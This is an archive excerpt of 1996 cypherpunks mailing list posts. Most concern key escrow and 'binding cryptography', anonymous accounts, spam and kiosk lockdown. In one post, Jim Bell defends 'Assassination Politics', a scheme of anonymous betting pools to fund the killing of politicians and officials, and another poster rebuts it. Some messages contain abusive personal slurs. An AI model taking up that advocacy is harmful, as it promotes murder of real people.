>> I think the biggest problem with allowing "anyone" to check the
>> correctness of a key is that what is a technical possibility today,
>> will become a legally-mandated requirement tomorrow.  What if
>> Internet backbone companies and/or ISP's were told that they had to
>> implement software check these keys, and if they discovered an
>> "incorrect" escrowed key, they were legally obligated to either
>> refuse to forward that message, and/or forward a copy of that
>> message to someone like Spooks@NSA.gov or Thugs@DOJ.gov.    
>
>The information society is international by nature; we want to
>securely communicate with Singapore. If Singapore, a democratic
>country!, has such a crypto policy that they want the above control,
>then so be it. Don't blame "binding cryptography" for making that
>possible, but start a dialogue with your politicians on what features
>of the proposal are acceptable in your country.

No, I think I _will_ blame your infernal invention for trying to make 
limited communication possible!   There's no doubt that the leadership of 
places like Singapore might want to restrict communication, but on the other 
hand they also want to be connected to the rest of the world for 
"non-political" speech.  In effect, they are forced to make a choice.  Most 
countries, except for a very highly authoritarian few, will probably opt for 
connectivity and this will lead to increased freedom for the people in their 
countries.  _YOU_ are trying to give those governments connectivity while 
maintaining tyranny.  Are you proud of what you're doing?

>
>Some countries seem to have the philosophy that "law-abiding" citizens
>should have nothing to "hide" from their government, so should not use
>encryption at all. I think that that is not acceptable. The concept
>behind the third-party checking is that no "law-abiding" citizen
>should have any problem that abuse - and only that - of a *voluntary*
>system can be "seen" by     many parties. 

I think the terms "voluntary" and "abuse" are contradictory in your 
statement.  If the system is "voluntary," then it is presumably "voluntary" 
to use a non-conforming system, right?  And unless the government's goal is 
to harass or imprison or fine  the user for not using that "voluntary" 
system, there is no purpose in knowing whether a person's use of encryption 
meets that "voluntary" standard.

>If and *how* checking is
>done, is a matter of each society. The same concept holds for many
>things in life and is well accepted.

I see:  "How each society decides to use our thumbscrews is totally 
voluntary and up to each country!"

Pardon me while I puke.

> For instance that is why cars
>have registration plates: if a car drives through after an accident on
>a *public* road, then by-standers (third parties) can observe that. I
>for one don't the information society to be the wild west, where
>anything goes.

I'm much closer to "the wild west" than you are, and I like it just fine.  I 
prefer it much better than the tyranny of stratified societies that have 
enslaved people for over a thousand years.


>Of course, people are rightfully worried that such a checkable system
>might be abused by a totalitarian regime to control their citizens.
>However, as long as such a system is voluntary I see no problem.

Maybe you need to remember that the way governments use it, the definition 
of the word "voluntary" tends to pick up a rather Orwellian meaning.  Also, 
you need to remember that the difference between a "voluntary" and a 
mandatory system may be as little as a single law passed in the middle of 
the night by a legislature.  A law which you are intending to make possible!

> Signs
>in the USA indicate (cf. the NRC study & remarks of the president)
>that use of other systems will always be possible. 

You seem to have ignored by conjecture, where I pointed out that Internet 
backbones and ISP might, hypothetically, be required to check keys and 
report "violations" to the government on a moment-to-moment basis.  Further, 
they might be prohibited from forwarding messages that do not conform.  

This gets us back to the definition of the world "voluntary," again.  Even 
if such an eventuality should occur, the government could cynically say that 
use of non-conforming forms of encryption were still "voluntary," because 
it's true you could use them.  But they wouldn't be very useful if they 
didn't propagate on the Internet, now would they?


>Also, the above
>discussions already showed that if such a system is voluntary, then
>there are lots of way to go around it.

Not if the cooperation of everyone else is coerced!  And moreover, not if 
they are coerced into not dealing with anybody who doesn't go along.  

You must really hate freedom, huh?


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: everheul@mail.rijnhaave.nl
Date: Sun, 13 Oct 1996 03:51:00 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RE: RE: Binding cryptography - a fraud-detectible alternative to
Message-ID: <199610131050.LAA28296@mail.rijnhaave.nl>
MIME-Version: 1.0
Content-Type: text/plain


To  explain the backround of "binding cryptography" once more; with
respect to (interoperable, worldwide) security in the information
society socities/governments have to achieve two tasks: 1. 
stimulating the establishment of a security structure that protects
their citizens, but which does not aid criminals. 2. Coping with the
use of encryption by criminals outside of this framework.

An inherent problem with these tasks is that different
socities/governments have different views on the matter. So to achieve
the first task you'll need a concept behind the security structure
that is flexible enough to incorporate *any* crypto policy, i.e. from
liberal (Japan) to non-liberal (France). We believe that  "binding
cryptography" is flexible enough to achieve this: a liberal crypto
policy might use no Trusted Retrieval Parties at all, while a very
non-liberal country might want one (government controlled) TRP, a
compliance check on all network traffic and a ban on other crypto.
With binding cryptography the issue on a crypto policy becomes
non-technical and politically debatable: which features does a country
want and what implementation?

Adam Back[SMTP:aba@dcs.ex.ac.uk] wrote:
> This much is the same as clipper I, just the parties have been
> renamed (TRP = split escrow key database holders, TTP = US
> government).  
No it is not. Among other things: it is a international solution, it
is based on Pub. Key. Enc. and it is flexible enough to follow
private-sector developments. It is not a key-escrow solution, as *you*
have (in principle) a very large choice in who to trust with your
communication.

Hal Finney[SMTP:hal@rain.org] wrote:
>Another flaw with schemes of this time (in terms of failing to meet
>their goals) is that they cannot detect superencryption and other
>forms of non-standard encryption of the message body proper.  All
>they can really do is verify from the outside that the same session
>key is encrypted for the two recipients (the intended recipient and
>the Government Access to Keys Party - let's not abuse the term by
>calling him a Trusted Third Party).  But they can't be sure that the
>session key is sufficient information to decrypt the message.
We offered a solution for the *first* task not for the *second*; the
point is that criminals(!) do not gain any real advantage from using
the system in that way as they - among other things - still face the
key-management problem. The above dicussions are only relevant in
countries where the use of crypto outside the structure would be
prohibited. BTW, it is by such discussions that I believe such a ban
is ineffective and in fact counterproductive.

Adam Back[SMTP:aba@dcs.ex.ac.uk] wrote:
> The paper suggests that in one plausible implementation, the
> checkers referred to could be network service providers:
>
> from the summary of the paper posted here:
>: The idea is that any third party, e.g., a network or service
>provider,
>                                          ^^^^^^^^^^^^^^^^^^^^^^^^^^^
>: who has access to components 2, 3 and 4 (but not to any additional
>: secret information) can: : a. check whether the session keys in
>components 2 and 3 coincide; : b. not determine any information on
>the actual session key.
>
> This would allow for instance for a software only implementation of
> a madatory key escrow system.  The government in question could then
> deputize ISPs to do their mandatory GAK compliance checking for
> them. (Deputizing companies is a recent trend in law enforcment
> techniques anyway).
>
> This would allow for instance IP level encryption, with
> non-conforming encrypted packets being dropped by all ISPs in the
> country in question.  Something the Singaporeans might find useful. 
> The checking functionality could also be added to a key escrow
> enabled router.
>
> For this kind of application, binding cryptography is spot on.
Jim bell[SMTP:jimbell@pacifier.com] wrote:
> I think the biggest problem with allowing "anyone" to check the
> correctness of a key is that what is a technical possibility today,
> will become a legally-mandated requirement tomorrow.  What if
> Internet backbone companies and/or ISP's were told that they had to
> implement software check these keys, and if they discovered an
> "incorrect" escrowed key, they were legally obligated to either
> refuse to forward that message, and/or forward a copy of that
> message to someone like Spooks@NSA.gov or Thugs@DOJ.gov.    

The information society is international by nature; we want to
securely communicate with Singapore. If Singapore, a democratic
country!, has such a crypto policy that they want the above control,
then so be it. Don't blame "binding cryptography" for making that
possible, but start a dialogue with your politicians on what features
of the proposal are acceptable in your country.

Some countries seem to have the philosophy that "law-abiding" citizens
should have nothing to "hide" from their government, so should not use
encryption at all. I think that that is not acceptable. The concept
behind the third-party checking is that no "law-abiding" citizen
should have any problem that abuse - and only that - of a *voluntary*
system can be "seen" by     many parties. If and *how* checking is
done, is a matter of each society. The same concept holds for many
things in life and is well accepted. For instance that is why cars
have registration plates: if a car drives through after an accident on
a *public* road, then by-standers (third parties) can observe that. I
for one don't the information society to be the wild west, where
anything goes.

Of course, people are rightfully worried that such a checkable system
might be abused by a totalitarian regime to control their citizens.
However, as long as such a system is voluntary I see no problem. Signs
in the USA indicate (cf. the NRC study & remarks of the president)
that use of other systems will always be possible. Also, the above
discussions already showed that if such a system is voluntary, then
there are lots of way to go around it.

Adam Back[SMTP:aba@dcs.ex.ac.uk] wrote:
> As your paper describes, your system allows anyone to check the
> correctness of the escrowed session key.  Have you considered
> modifying it so that the only person who can check is the owner of a
> designated private key of a public/private key pair?  This would
> allow say for the TTP to check correctness, and not the TRP, nor the
> public. I'm not sure of the usefulness of this, but it allows you to
> select from the full spectrum according to requirements:
>
> a) no one can check, PGP second recipient (Carl Ellison, Bill
> Stewart) b) recipient only can check (my suggestion) c) holder(s) of
> designated keys can check d) anyone can check (your proposal)
>
> c) should be easy to acheive: restrict d) by having the sender
> encrypt the escrowed session key a second time to this public key.
Point a) can be circumvented too easily.
How do you envision point b? Sending all keys (or a selection) to the
recipient for checking is: impractical & dangerous (you want the
distance between the actual communication and the guy that can
decypher as large as possible). If you don't send keys, then abuse
will only show up during a warrant. But that abuse will show up
anyway.. So what is the use? Point c is a nice suggestion. Although I
for one have no problem that anyone can see that I comply with the
rules (..unless of course it is a non-voluntary system etc..).

Adam Back[SMTP:aba@dcs.ex.ac.uk] wrote:
> My assumption was that a TRP is a government front.  (All of the
> proposed clipper I escrow agents have been major US defense
> contractors/government agencies, in addition the clipper I documents
Bring in to action your politicians ("the voice of the people") to let
the regulation on Trusted Retrieval Parties be as liberal as you find 
acceptable.

Peter M Allan[SMTP:peter.allan@aeat.co.uk] wrote:
>  1)  What's in it for the user ?
>  2)  What happens when the Feds recover meaningless data?
1) They get *one* system set up by governments that will make it
possible to securely communicate (and do with business) with the whole
(democratic) world. Instead of several partial systems set up by
private companies where responsibilities will be vague. I consider a
certified public key as a digital passport; setting up the structure
for passports is a task of governments. 2) Only during a warrant
policemen will see that; what then happens must every society on his
own decide. Probably nothing happens, as otherwise the investigation
will probably be to disturbed.


Best regards, Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 13 Oct 1996 09:50:16 -0700 (PDT)
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: [Book] The Cobweb
Message-ID: <199610131756.MAA22116@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Just finished with 'The Cobweb' by Neal Stephenson and his
uncle,* writing under the nym Stephen Bury.  The Cobweb is
entertaining, and easily worth the $14 I paid.

	Its cpunk relevance is a little limited except for the Iowa
deputy sheriff who figures out an Iraqi biolological weapons scheme in
the US, while the CIA, FBI and NSA fight State, Agriculture
and each other over how, or if, to react.  Mercenary Soviet Antonov
transport planes, stateless Kurds, and encrypted radio links all play
their parts.  We never do find out if the NSA can decrypt them in time.

	ISBN 0-552-37828-7.  Bantam, Sept 1996.


*I forget his uncle's name; hes a history professor who can't be seen
writing books with a Sci-fi author like Neal.  The usefulness of nyms.
They also wrote 'Interface.'

-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sun, 13 Oct 1996 09:53:52 -0700 (PDT)
To: azur@netcom.com (Steve Schear)
Subject: Re: exporting signatures only/CAPI (was Re: Why not PGP?)
In-Reply-To: <v02130503ae865897f409@[10.0.2.15]>
Message-ID: <199610131759.MAA22134@homeport.org>
MIME-Version: 1.0
Content-Type: text


Steve Schear wrote:

| I've been charged with developing an Internet service which needs to assure
| its clients of anonymity.  However, we fear some clients may abuse the
| service and we wish to prevent the abusers from re-enrollment if
| terminated for misbehavior. (In your example, it would be the person(s)
| trying to discover the service host via flood).

	Why not have a high sign up fee or deposit?  Let people play
games, and pay for it.  Trying to build morality into a crypto system
is tough.  Its easier to move the costs up front. Let those who
want to pay the deposit fee repeatedly do so.  Think of it as a tax
refund. :)

Adam


-- 
"Every year the Republicans campaign like Libertarians, and then go to
Wasthington and spend like Democrats."

Vote Harry Browne for President.  http://www.harrybrowne96.org







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 13 Oct 1996 14:27:58 -0700 (PDT)
To: attila <cypherpunks@toad.com
Subject: Re: is there no end to AP & Creative Wiretap Arguments?
Message-ID: <199610132127.OAA19213@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:47 AM 10/12/96 +0000, attila wrote:
>        after months of patient explanations to Jim Bell and 
>    sympathizers, going over the same points in 31 flavours,
>    the same arguments of what I would call "respectable" anarchy 
>    (well stated by Tim May) rather than the "world at war" anarchy of 
>    Jim Bell --  where are we?!?
>
>        I read Jim's first "manifesto" at least 18 months ago; and, the
>    "refined manifsto" less than a month ago.  I have yet to see an 
>    application of civilization which brings AP society up to even the 
>    level of Tombstone AZ just prior to the OK Corral.

Be careful about the Wild West analogies.  Current theory is that contrary 
to what Hollywood cooked up for our movie-viewing pleasure, it was a rather 
peaceful place most of the time.  If anything, the reason that certain 
incidents (OK Corral) were so memorable is that they were, likewise, rare.

>
>        Jim's theories all hinge on betting pools which supposedly can
>    be run like the lottery where the poor can share a ticket 
>    (egalitarian, of course), anonyminity (which as an argument is 
>    appropriate, but what for in a selfish immoral act?),  and a 
>    justice is served attitude, even if there are mistakes.

I would be far more worried about "mistakes" if I hadn't already thought 
through it, and concluded that abuse and misuse and errors would be strongly 
deterred by the very structure of the AP system.  It will most easily attack 
who coerce the most people, for example politicians, bureaucrats, and some 
government employees in general, precisely because the cost will be shared 
among hundreds or thousands.  It will also fairly easily get rid of "common 
criminals," since most people have been a victim of crime at some point in 
their lives and would be willing to pay to prevent this in the future.  
However, using AP to attack undeserving people will be difficult precisely 
because it would be rather expensive, since the cost will presumably not be 
shared.

True, it isn't any kind of centralized coercive control, but it is a 
excellent form of control, somewhat analogous to the "invisible hand" 
concept of free markets.  The problem is, it's difficult for some people to 
comprehend the kind of distributed-control that free markets represent.  


>        the whole concept of AP does not even support the concept of
>    "justice is expeditiously served!"   it is a resort to the manners
>    of dogs and monkeys sitting at the same table --a spiteful, 
>    arrogant player can move the betting pools to assassinate anyone.

There is a powerful limitation as to how much one individual can manipulate 
the system, as I've previously described...  And besides, the problem you 
describe already exists:  Gang-related murders are an example.   AP would 
eliminate the gangs, at least to the extent that they are a threat to others.


>        In other words, are we planning to use James Caan as the lead
>    runner in "Roller Ball"  --except this time we're playing with a 
>    "live" society for which we hold in common the utmost contempt?  
>
>        are we trying to return to the bread and circus mentality of 
>    Rome on its deathbed and slide to subjecation by Attila the Hun 
>    who was actually stopped from sacking Rome after the Pope so 
>    impressed him with his regal robes....  deciding  tribute from an 
>    established dictatorship was more reliable?  --and less costly?!?
>
>        has anyone seen a single social moral fiber in Jim's often 
>    passionate arguments for AP,

I'm afraid yours is a vastly distorted question.    Let's go back to the 
beginning, shall we?  I've claimed that AP will:

1.  Eliminate war and militaries.
2.  Eliminate government and taxes.
3.  Eliminate dictatorships and political tyranny.
4.  Drastically reduce crime and the costs of crime.

Add all this up, and presume that I think it's a good thing (I do) and how 
can you claim that this is not "a single social moral fiber"?

Sure, you could claim that AP won't do these things, or not all of them, or 
not very well.  I happen to believe it will.  Even if you're partly right, 
at most you have a challenge to my judgment, not my morality or sincerity.

>    or even in the "results" in a society
>    which will never breed another leader: religious, secular, or even
>    political?  

What, exactly, is wrong with a society without leaders?  Do we NEED leaders? 
 I understand that people have probably gotten so used to the concept of 
having leaders around that its hard to imagine the alternative, but you're 
going to have to do better than this to support the existence of leaders.



>        does AP permit anything except slaves and drones which can 
>    just as easily be replaced by robots?  maybe noone will miss news
>    reports (as 'canned' as they are),

This may sound odd, but what is there wasn't any news to report?  Maybe 
that's exaggerating things a bit, there will always be weather and the 
occasional accident and other events.  But watch the news for a while, and 
notice what a large fraction of it is government-related, politics-related, 
war-related, coercion-related, etc.  

>    or movies which entertain or provoke?

It's unclear why you think AP will prevent this?

>  or ice cream sundaes at the soda fountain?

likewise...

>        ...and the disappearance of grocers, and doctors, and dentists
>    bringing forth a new age of subsistence farming and hunting for 
>    the lucky few who might live to a readjusted live expectancy point
>    of 30 yrs, burning books and computer printouts for cooking and 
>    warmth.

Is this line of argumentation a throwback to the "we've got to have a 
dictator!  How else will society operate?"

>
>        why have books or knowledge when there is noone willing to
>    accept the responsibility of educating your children, the instructor
>    waiting for the parent of Dumb Suzy to avenge her failing grade? 

If it's a private, non-coerced school, why should this happen?

>        sacrificing 55,000 men and frying the brains of another
>    1.5 million solely to fatten the industrial war machine?   using
>    John Foster Dulles' "domino theory" to justify the carnage... 

BTW, in an AP society Vietnam couldn't ever happen, for at least a dozen 
reasons.

>        to bad I was still of an era which said 'you will serve if called'
>    and so stupid to take almost six years to get out.  Would you 
>    serve a country today which is rotten to the core?

No, I won't.  But I will be happy to help eliminate that rot.


>        "Assassination Politics" is nothing more than a childish game
>    which 'legalizes' killing anyone you wish.  are AP's proponents so 
>    naive they believe the bookies will not have any public person 
>    assassinated by rigging the pools for their own profit?  remember,
>    law enforcement ceased with the return of 'law of the jungle' 
>    anarchy.  

"Laws" will no longer be enforced, it's true.  However, legitimate interests 
will be defended and intiation of force will be punished.


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Sun, 13 Oct 1996 14:11:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Fuck Cyberpromo
Message-ID: <3.0b34.32.19961013151208.006a24c4@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:07 AM 10/13/96 CST, roy@scytale.com wrote:
[snip]

>Anyone on the list know of a good, heavy-handed collection agency that
>would like to take this when it tops, say, $500?

Why not just filter the shit?   It's not like they're switching addresses
or anything.  All mail from that address just goes straight to my trash
unread...


Rich


______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 13 Oct 1996 15:15:28 -0700 (PDT)
To: "Michael Froomkin - U.Miami School of Law" <azur@netcom.com>
Subject: Re: Blinded Identities [was Re: exporting signatures only/CAPI]
Message-ID: <199610132214.PAA27575@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:28 PM 10/13/96 -0400, Michael Froomkin - U.Miami School of Law wrote:
>It is unpublished, but he kindly allowed to me describe it in a paper I
>wrote that discussed whether a bank would ever want to take the risk of
>allowing bank accounts where it did not know the identity of the customer.

Why should that be a problem?   It's the customer's money, isn't it?  It's 
not like the bank is making a loan.  It's the customer who should be 
worried...about the bank's identity.

Remember "plausible denial."  Shouldn't we believe that if a bank cannot 
know its customer, likewise it isn't responsible for who that customer is?  
A bank's legitimate interests should  not include acting as enforcer for the 
government, so any system that prevents this from happening is helpful.  

And I don't think that a bank can ever be embarrassed (assuming bank 
accounts are anonymous) by it being revealed that some particular bad guy 
kept his money there, any more than other cash-based (anonymous) businesses 
are embarrassed if it is revealed that some bad guy used their services.

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mixmaster@remail.obscura.com (Mixmaster)
Date: Sun, 13 Oct 1996 16:08:34 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: [STEGO] Enigma
Message-ID: <199610132241.PAA00152@sirius.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


Timmy C[ocksucker] May is a phoney and a fraud.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael Froomkin - U.Miami School of Law" <froomkin@law.miami.edu>
Date: Sun, 13 Oct 1996 13:26:14 -0700 (PDT)
To: Steve Schear <azur@netcom.com>
Subject: Blinded Identities [was Re: exporting signatures only/CAPI]
In-Reply-To: <v02130503ae865897f409@[10.0.2.15]>
Message-ID: <Pine.SUN.3.95.961013162235.21791C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


[cc'd to coderpunks]

On Sun, 13 Oct 1996, Steve Schear wrote:

> >Steve Shear <azur@netcom.com> writes:

[much cut]
> 
> I've been charged with developing an Internet service which needs to assure
> its clients of anonymity.  However, we fear some clients may abuse the
> service and we wish to prevent the abusers from re-enrollment if
> terminated for misbehavior. (In your example, it would be the person(s)
> trying to discover the service host via flood).
> 
> My thought was to base enrollment on some sort of 'blinding' of their
> certified signature (e.g., from Verisign) which produces a unique result
> for each signature but prevents the service from reconstructing the
> signature itself (and thereby reveal the client's identity).  I'm calling
> this negative authentication.
> 
> Have you come across anyone who has considered this problem or
> another one which is mathematically very similar?

Stefan Brands has a protocol that probably does what you want.  And also
would form the basis for anonymous internet "postage stamps"...

It is unpublished, but he kindly allowed to me describe it in a paper I
wrote that discussed whether a bank would ever want to take the risk of
allowing bank accounts where it did not know the identity of the customer.

The protocol is described at 

http://www.law.miami.edu/~froomkin/articles/oceanno.htm#ENDNOTE286

[A frames version of the same paper is at 

http://www.law.miami.edu/~froomkin/articles/ocean.htm

but it's harder to jump straight to the footnote you want in that version]

**Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"**
                  **Age two weeks: 9 lbs 12 oz, 23"**
A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Russell/SYBASE <Ryan.Russell@sybase.com>
Date: Sun, 13 Oct 1996 16:39:09 -0700 (PDT)
To: Compton <kpieckie@sybase.com>
Subject: Re: -No Subject-
Message-ID: <9610132338.AA13061@notesgw2.sybase.com>
MIME-Version: 1.0
Content-Type: text/plain


Why not just make flute or netscape your shell
instead of program manager?

(Shell= line in system.ini)

    Ryan

---------- Previous Message ----------
To: cypherpunks
cc: 
From: kpieckie @ Harding.edu (Compton) @ smtp
Date: 10/11/96 11:12:03 PM
Subject: -No Subject-


Due to the high volume of mail from this list, I rarely get to read every
message that comes through here.  Thus, I ask a reply be sent to
kpieckie@harding.edu directly rather than through the list.

Please forgive the interruption if this message is slightly off-topic.

The library here at Harding University is attempting to set up some
internet computers that run Netscape only and do not allow access to
anything else on the computers.  We use a scripting program called Flute
that hides the Program Manager (WFW 3.11) and reloads Netscape when it is
nuked with Alt-F4.  Another program removes the ability to use any of the
netscape pulldown menus less help.

The problem is the keyboard.  If a user hit's Alt-F4 after Progman has
loaded but before the Flute script executes, Flute is terminated and the
user has access to the computer.  Are there any programs that will disable
Alt-F4 and Control-Esc in Windows?  Where can they be attained?  Freeware
is preferable, shareware is fine, trial period is required for commercial
products.  Thanks.

Kevin
kpieckie@harding.edu








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Homer W. Smith" <homer@lightlink.com>
Date: Sun, 13 Oct 1996 14:31:18 -0700 (PDT)
Subject: Re: None
In-Reply-To: <199610131850.UAA04763@basement.replay.com>
Message-ID: <Pine.SUN.3.95.961013173012.19654D-100000@light.lightlink.com>
MIME-Version: 1.0
Content-Type: text/plain


> Thanks for telling me where to find the NOTs; I always wanted to read
> about how to rid myself of body thetans.  Now I have been enlightened
> by Hubbard's words and you are guilty of contributory copyright
> infringement.  (The SPA told me so :)
> 

     I am guilty of contributory copyright infringement?
 
     Homer






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Lojewski <lojewski@switzerland-c.it.earthlink.net>
Date: Sun, 13 Oct 1996 18:25:21 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: BAY AREA CYPHERPUNKS SATURDAY 10/12 TRESSIDER HALL STANFORD
Message-ID: <1.5.4.32.19961014012455.0071f8a4@mail.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


How do I get off this list?

>X-Sender: erchiu@diablo.cisco.com
>Date: Fri, 11 Oct 1996 11:54:43 -0700
>To: Bill Stewart <stewarts@ix.netcom.com>
>From: Eric Chiu <erchiu@cisco.com>
>Subject: Re: BAY AREA CYPHERPUNKS SATURDAY 10/12 TRESSIDER HALL STANFORD
>Cc: cypherpunks@toad.com
>Sender: owner-cypherpunks@toad.com
>
>At 01:06 AM 10/11/96 -0700, you wrote:
>>There will be a San Francisco Bay Area Cypherpunks meeting on Saturday 10/12 
>>at Stanford University.  The meeting location will be the tables outside
>>Tressider Hall, where we've met for several previous meetings.
>>The canonical time is noon for lunch and milling around, and 1pm
>>for organized program.
>
>Bill -
>
>What time is the meeting?
>Eric Chiu
>IS-Finance and Adminstration 
>Tel:   408-527-1665
>Pager: 415-424-7282
>
>
>

---------------------------------------------------------
Tom Lojewski - ProNet Consulting - lojewski@earthlink.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Lojewski <lojewski@switzerland-c.it.earthlink.net>
Date: Sun, 13 Oct 1996 18:29:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Clinternet?
Message-ID: <1.5.4.32.19961014012929.0071c86c@mail.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain



How do I get off this list?

>X-Sender: rah@tiac.net
>Date: Fri, 11 Oct 1996 12:02:04 -0400
>To: cypherpunks@toad.com
>From: Robert Hettinga <rah@shipwright.com>
>Subject: Clinternet?
>Sender: owner-cypherpunks@toad.com
>
>Hoo boy.
>
>I had the most amazing whiff of paranoia from the morning news.
>
>Clinton wants to buy the internet back for $500 million so he can watch us
>better?
>
>Nawwww, 'course not...
>
>Cheers,
>Bob Hettinga
>
>-----------------
>Robert Hettinga (rah@shipwright.com)
>e$, 44 Farquhar Street, Boston, MA 02131 USA
>"The cost of anything is the foregone alternative" -- Walter Johnson
>The e$ Home Page: http://www.vmeng.com/rah/
>
>
>
>

---------------------------------------------------------
Tom Lojewski - ProNet Consulting - lojewski@earthlink.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Lojewski <lojewski@switzerland-c.it.earthlink.net>
Date: Sun, 13 Oct 1996 18:32:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [NOISE] Funny quote in Word-A-Day
Message-ID: <1.5.4.32.19961014013218.0071cae0@mail.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain



How do I get off the cypherpunks list?

>Date: Fri, 11 Oct 1996 08:18:24 -0400 (EDT)
>From: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
>To: cypherpunks@toad.com
>Subject: [NOISE] Funny quote in Word-A-Day
>Sender: owner-cypherpunks@toad.com
>
>the Word-A-Day mailing list came up with a humorous quote,
>almost germane to some of the ramblings on this list....
>
>
>
>>Reputation: what others are not thinking about you.
>>
>>To subscribe or unsubscribe, please send a message to 
>>wsmith@wordsmith.org
>>with "Subject:" line as "subscribe <Your Real Name>" or "unsubscribe".
>>Email anu@wordsmith.org if you have any questions, comments or 
>>suggestions.
>>Archives, FAQ, words and more at the WWW site: 
>>http://www.wordsmith.org/awad/
>
>So long, Perry....
>Let us know when you get a new list set up & best wishes.
>
>
>-----BEGIN PGP PUBLIC KEY BLOCK-----
>Version: 2.6.2
>mQCNAzBz1GQAAAEEANGl0daeboCV8dBSLxycjYd5tIJNOmKN2Y8hCXhF5cLt0nVu
>NUDMgmUWF4zoZtBDNbtVF0wTTxEcBEHOLjIuZKPeiT7Bw266HhTahXxOIaOXZyDj
>5VMISVvt9/Ua31JfxfCwK0iPtojFtKcNU13z/hrYA7Q5LfqsVF4ZsVsZPDGdAAUT
>tClQLkouIFBvbmRlciA8cG9uZGVyQG1haWwuaXJtLnN0YXRlLmZsLnVzPg==
>=lVU7
>-----END PGP PUBLIC KEY BLOCK-----
>
>
>
>

---------------------------------------------------------
Tom Lojewski - ProNet Consulting - lojewski@earthlink.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Lojewski <lojewski@switzerland-c.it.earthlink.net>
Date: Sun, 13 Oct 1996 18:39:45 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: L.Detwieler
Message-ID: <1.5.4.32.19961014013918.0071c920@mail.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain



How do I get off this list?

>To: cypherpunks@toad.com
>Subject: Re: L.Detwieler
>From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
>Comments: Dole/Kemp '96!
>Date: Wed, 09 Oct 96 18:11:29 EDT
>Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y.
>Sender: owner-cypherpunks@toad.com
>
>"Butler, Scott" <SButler@chemson.com> writes:
>
>> Clipped from WELCOME TO CYPHERPUNKS
>> >The cypherpunks list has its very own net.loon, a fellow named L.
>> >Detweiler.  The history is too long for here
>>
>> Can anyone give me the details of The History of this character and wot
>> he is on about
>
>Is it time to update the welcome text and add yours truly to it?
>
>Timmy May is an asshole.
>
>---
>
>Dr.Dimitri Vulis KOTM
>Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps
>
>

---------------------------------------------------------
Tom Lojewski - ProNet Consulting - lojewski@earthlink.net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Sun, 13 Oct 1996 19:02:19 -0700 (PDT)
To: richieb@teleport.com (Rich Burroughs)
Subject: Re: Fuck Cyberpromo
In-Reply-To: <3.0b34.32.19961013151208.006a24c4@mail.teleport.com>
Message-ID: <961013.201053.7B3.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, richieb@teleport.com writes:

> At 11:07 AM 10/13/96 CST, roy@scytale.com wrote:
> [snip]
>
>>Anyone on the list know of a good, heavy-handed collection agency that
>>would like to take this when it tops, say, $500?
>
> Why not just filter the shit?

Can't filter until the traffic is delivered to the local system here.
By that time, I've already paid for its delivery.  Wallace and
CyberPromo are costing me real, measurable money, and I want it stopped.

Besides, it will be a valuable precedent if I can collect (or even
obtain a judgement).  This is right in line with the junk fax law, which
recognized that junk faxes consume the receiver's resources without
permission or compensation.

